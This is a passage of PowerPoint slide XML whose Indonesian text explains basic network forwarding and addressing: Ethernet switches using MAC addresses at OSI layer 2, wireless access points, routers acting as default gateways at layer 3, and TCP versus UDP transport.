              <a:t>pengalamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cakupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengalamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengalihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> frame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Adaptor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2 model OSI. Sebagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> LAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Ethernet. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Ethernet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media (MAC) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alamat MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 48-bit yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>notasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>heksadesimal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 00-15-5D-01- CA-4A. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengalamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain broadcast.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jembatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stasiun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2 model OSI. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengalamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MAC pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekitar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet Protocol (IP). Router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 3 model OSI. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> router yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertindak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gateway default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transportasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertukar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Transmission Control Protocol (TCP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> User Datagram Protocol (UDP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> transfer yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
